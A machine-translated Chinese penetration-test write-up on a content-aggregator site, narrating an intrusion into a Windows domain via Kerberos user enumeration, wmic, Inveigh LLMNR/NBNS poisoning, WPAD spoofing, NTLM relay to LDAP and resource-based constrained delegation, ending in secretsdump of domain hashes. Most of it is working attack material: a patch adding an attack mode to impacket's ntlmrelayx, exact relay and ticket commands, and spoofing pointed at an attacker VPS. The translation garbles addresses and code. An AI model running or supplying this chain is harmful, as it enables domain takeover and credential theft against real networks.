Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to use relay and delegation". In daily operation, I believe many people have doubts about how to use relay and delegation. The editor consulted all kinds of data and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts about "how to use relay and delegation"! Next, please follow the editor to study!

0x01 background

After dialing into the intranet through VPN, according to the sending route and previous detection, it is found that there are two active segments in the target intranet: 10.10.1.0 + 24 and 10.10.2.0 + + 24. 10.10.1.88 is the domain controller.

0x02

According to the previous information collection, there is no point in the active section that can be used directly to sort out the existing information on hand. The hostnames of the machines in the target private network are all ATTACK-TONY-PC, and the string in the middle is guessed as the user name. Our guess is verified by using the characteristics of Kerberos pre-auth, and all hostnames and VPN passwords are collected to successfully enumerate a set of passwords. The specific tools used refer to the penetration skills-- user enumeration and password blasting through Kerberos pre-auth

0x03

According to past experience, this kind of domain with the user name as the host name will most likely add the domain user to the local administrator group, find the corresponding machine of the user, and try wmic directly.

Wmic / node:10.10.1.96 / user:ATTACK\ TONY / password:1qaz2wsx os get name

Sure enough, the operating system information returned correctly. Continue to get the process on the machine through wmic

Wmic / node:10.10.1.96 / user:ATTACK\ TONY / password:1qaz2wsx process get name

According to the protection software on the machine to carry out the corresponding kill-free, landing binaries, online to CS. At this point, we have obtained a foothold in the domain. Unfortunately, the owner of this machine seems to be a marginal person, and he can't find any information to help us through the machine. The 500 users on this machine are empty passwords. Looking at the information in LDAP, almost all the machines in the domain are win10, and there are a few server 2016. Currently, we are at 10.10.1.96, and the location of domain administration is 10.10.2.66. Continue to look at the information in LDAP, one of which we are more concerned about: most machines mS-DS-CreatorSID is the corresponding user's SID, a small number of machines are mS-DS-CreatorSID the same user's SID (network administrator). In other words, the machines in the domain are basically pulled into the domain by the user, and the domain user has WriteProperty permission to the machine user he pulls in, and can manipulate the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the machine user. If we have the permissions of the user, we meet two conditions for delegation using resource-based constraints

The msDS-AllowedToActOnBehalfOfOtherIdentity property can be modified

There is a machine account (it is not very accurate here, it should be an account with SPN, or in more detail, a TGT of an account is required. The machine account meets the above conditions)

Machine account We can use the machine ATTACK-TONY-PC$, that we got before, so where can we get the user rights?

0x04 WPAD + NTLM Relay + Resource-based constraint delegation

Before we begin, let's make a brief explanation of the knowledge points involved. (it's just a simple mention here. If you want to fully understand it, you need to learn all kinds of knowledge points by yourself.)

WPAD

WPAD (Web Proxy Auto-Discovery Protocol) is the abbreviation of Web proxy automatic Discovery Protocol. The function of this protocol is to enable users' browsers in the local area network to automatically discover the proxy server in the intranet and use the discovered proxy server to connect to the Internet or the intranet. When the system turns on the proxy automatic discovery function, when the user uses the browser to surf the Internet, the browser will automatically find the proxy server in the current local area network. If the proxy server is found, a configuration file named PAC (Proxy Auto-Config) will be downloaded from the proxy server. This file defines the proxy server that users should use when accessing a URL. The browser downloads and parses the file and sets the corresponding proxy server to the user's browser. In the process of requesting WPAD, if the server requires 401 authentication, some browsers and applications will automatically use the current user credentials for authentication.

LLMNR,NBT-NS

LLMNR and NBT-NS are both protocols used in the name resolution mechanism. In the process of windows name resolution, the approximate order is DNS-> LLMNR-> NetBIOS. To put it simply, if the address cannot be resolved by the DNS protocol, windows will send a broadcast (LLMNR,NetBIOS) in the subdomain of the current network domain to request address resolution. If we are in the same subnet domain as the target machine, we can reply to the broadcast to deceive the address resolution.

NTLM Ralay

NTLM Relay

Resource-based constraint delegation

Resource-based constraint delegation was introduced in Windows Server 2012. Resource-based constraint delegation allows resources to configure trusted accounts to delegate to them. Resource-based constraint delegation gives delegated control to the administrator who owns the accessed resource.

Domain infiltration-Resource-based constraint delegation Utilization

After understanding the above knowledge, we can start to attack. The attack process is as follows: poison the current network segment, cheat through WPAD, let the user authenticate the NTLM to us, and then relay the authentication request to LDAP, because the user can modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the machine he pulls in, and we modify this attribute to configure resource-based constraint delegation to get the permissions of the host.

0x05 modifies impacket

Impacket currently only sees the ability to modify resource-based constraint delegation from the machine user relay, which needs to be slightly modified for our attack flow. In order to make it convenient for some students to debug, I put the modification process here. I can skip it directly if I don't want to see it. There is a modified and packaged impacket at the end of the article.

/ impacket/examples/ntlmrelayx.py

Add options.user_delegate_access

C.setLDAPOptions (options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid, options.user_delegate_access)

Add where the parameter is processed

Ldapoptions.add_argument ('--user-delegate-access', action='store_true', required=False, help='Delegate access on relayed user account to the specified account')

/ impacket/impacket/examples/ntlmrelayx/utils/config.py

Modify the function setLDAPOptions and add userdelegateaccess

Def setLDAPOptions (self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, sid, userdelegateaccess):

Self.dumpdomain = dumpdomain

Self.addda = addda

Self.aclattack = aclattack

Self.validateprivs = validateprivs

Self.escalateuser = escalateuser

Self.addcomputer = addcomputer

Self.delegateaccess = delegateaccess

Self.dumplaps = dumplaps

Self.dumpgmsa = dumpgmsa

Self.sid = sid

Self.userdelegateaccess = userdelegateaccess

/ impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py

Add a global variable delegatePerformedUser

Add the following code to class LDAPAttack (ProtocolAttack):

Def MFdelegateAttack (self, usersam, targetsam, domainDumper, sid, ssid):

Global delegatePerformedUser

If not usersam:

Usersam = self.addComputer ('CN=Computers,%s'% domainDumper.root, domainDumper)

Self.config.escalateuser = usersam

If not sid:

# Get escalate user sid

Result = self.getUserInfo (domainDumper, usersam)

If not result:

LOG.error ('User to escalate does not customers')

Return

Escalate_sid = str (result [1]) # sid

Else:

Escalate_sid = usersam

AttackList = self.getCreatorSID (domainDumper, ssid)

# LOG.debug (AttackList)

# LOG.debug (escalate_sid)

If AttackList is False:

LOG.info ('Cannot find a computer with mS-DS-CreatorSID% s'% ssid)

Return

LOG.info ("Try to modifiy delegation rights")

For Attack in AttackList:

Self.addDelegation (Attack [0], escalate_sid)

DelegatePerformedUser.append (targetsam)

Def addDelegation (self,target_dn,escalate_sid):

Self.client.search (target_dn,'(objectClass=*)', search_scope=ldap3.BASE, attributes= ['SAMAccountName','objectSid',' msDS-AllowedToActOnBehalfOfOtherIdentity','name'])

Targetuser = None

For entry in self.client.response:

If entry ['type']! =' searchResEntry':

Continue

Targetuser = entry

If not targetuser:

LOG.error ('Could not query target user properties')

Return False

Try:

Sd = ldaptypes.SR_SECURITY_DESCRIPTOR (data=targetuser ['raw_attributes'] [' msDS-AllowedToActOnBehalfOfOtherIdentity'] [0])

LOG.debug ('Currently allowed sids:')

For ace in sd ['Dacl'] .aces:

LOG.debug ('% s'% ace ['Ace'] [' Sid'] .formatCanonical ())

Except IndexError:

Sd = create_empty_sd ()

Sd ['Dacl'] .aces.append (create_allow_ace (escalate_sid))

Self.client.modify (targetuser ['dn'], {' msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData ()]]})

If self.client.result ['result'] = = 0:

LOG.info ('Delegation rights modified successes fulfilled')

LOG.info ('% s can now impersonate users on% s via S4U2Proxylic, self.config.escalateuser, targetuser ['attributes'] [' name'])

Return True

Else:

If self.client.result ['result'] = = 50:

LOG.error ('Could not modify object, the server reports insufficient rights:% message', self.client.result [' message'])

Elif self.client.result ['result'] = = 19:

LOG.error ('Could not modify object, the server reports a constrained violation:% message', self.client.result [' message'])

Else:

LOG.error ('The server returned an error:% slots, self.client.result [' message'])

Return False

Def userdelegateAttack (self, usersam, targetsam, domainDumper, sid):

Global delegatePerformedUser

If targetsam in delegatePerformedUser:

LOG.info ('Delegate attack already performed for this User:% s, skipping'% targetsam)

Return

Self.client.search (domainDumper.root,'(sAMAccountName=%s)'% escape_filter_chars (targetsam), attributes= ['objectSid',' primaryGroupId'])

User = self.client.entries [0]

Usersid = user ['objectSid'] .value

Tmp_flag = self.getCreatorSID (domainDumper, usersid)

LOG.info ('Try to find the computer with mS-DS-CreatorSID% s'% usersid)

If tmp_flag is not False:

For x in tmp_flag:

LOG.info ('DN:% s SID:% s'% (x [0], x [1]))

Self.MFdelegateAttack (usersam, targetsam, domainDumper, sid, usersid)

Add the following code to the run function

If self.config.userdelegateaccess:

Self.userdelegateAttack (self.config.escalateuser, self.username, domainDumper, self.config.sid)

Return

Reinstall impacket

Pip3 uninstall impacket;pip3 install.

Usage

Sudo python3. / examples/ntlmrelayx.py-t ldap://192.168.1.63-- escalate-user=WIN10\ $--user-delegate-access

Sudo python3. / examples/ntlmrelayx.py-t ldaps://192.168.1.63-- user-delegate-access0x06 completes the attack chain

To avoid unnecessary accidents, use the local test environment instead

NamenoteAdminister domain administrator rabbit ordinary domain user test ordinary domain user nameosipnoteDCserver2016192.168.1.63 domain controller WIN10windows10192.168.1.59 personal PC, simulate the machine we took in the domain WIN10-1windows10192.168.1.78 personal PC, user ATTACT\ TEST pulls into the domain, logs in user ATTACT\ TESTWIN10-2windows10192.168.1.77 personal PC, user ATTACT\ TEST pulls into domain, login user ATTACT\ TESTkalikali192.168.1.79 simulates public network vps

First of all, we turn on Inveigh on the WIN10 machine to cheat on the LLMNR/NBNS protocol. Here we only need the function of poisoning, so we can only use the C# version of Inveigh, and we can also cooperate with cs's execute-assembly to avoid killing softwares. The spoofed address points to the vps of the public network, that is, the kali in the current environment.

Execute-assembly c:\ windows\ rabbit\ tools\ Inveigh.exe-SpooferIP 192.168.1.79

Kali enables ntlmrelay.py to listen and specify parameters for related attacks.

Sudo python3. / examples/ntlmrelayx.py-t ldap://192.168.1.63-- escalate-user=WIN10\ $--user-delegate-access-debug

Here, take chrome as an example. When user ATTACK\ TEST clicks chrome, it will trigger our attack chain and take over machine permissions.

A03bb9d7f80559c87765c72cb3d53d1d.png

As you can see, we successfully configured resource-based constraint delegation from WIN10 $to WIN10-1 and WIN10-2. Then you can apply for high-power tickets to access the corresponding services.

Python3 getST.py-dc-ip 192.168.1.63 ATTACK/WIN10\ $- hashes aad3b435b51404eeaad3b435b51404ee:0c5082ca74c579d34d4de279a84ee44f-spn host/WIN10-2.attack.com-impersonate administrator

Inject the ticket into the current context and try to access it, as shown in the figure, successfully obtaining permissions for machine WIN10-2.

For more information on what services need to be used and what bills to use, please refer to How Attackers Use Kerberos Silver Tickets to Exploit Systems here.

Service TypeService Silver TicketsWMIHOST,RPCSSPowerShell RemotingHOST,HTTP (WSMAN,RPCSS) WinRMHOST,HTTPScheduled TasksHOSTWindows File Share (CIFS) CIFSLDAP operations including Mimikatz DCSyncLDAPWindows Remote Server Administration ToolsRPCSS,LDAP,CIFS

For example:

That's the whole chain of attack. Back to the actual combat, in the actual combat, I got several development permissions through the attack chain orientation above (Inveigh specifies the SpooferIPsReply parameter to deceive a specific ip), and obtained the machine rights on the 10.10.2.0 SpooferIPsReply 24 segment from one of the machines, so that we moved to the same network segment as the domain administrator, then we can continue to relay the credentials of the domain management to LDAP to modify and add privileges to any user. Inveigh specifies the ip of the domain administration. Enable ntlmrelay snooping, specify the attack ldap, and specify the user.

Execute-assembly c:\ windows\ rabbit\ tools\ Inveigh.exe-SpooferIPsReply 10.10.2.66-SpooferIP VPS-IPproxychains python3. / examples/ntlmrelayx.py-t ldap://192.168.98.10-- escalate-user=rabbit

Two minutes later, the domain administrator requested our WPAD, successfully relayed to ldap and granted us the specified user privileges. (the process screenshot is still replaced by the test environment)

Next is the secretsdump.py dump domain manager hash, which takes over the domain control. At this point, get the permissions for the entire domain.

At this point, the study on "how to use relay and delegation" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.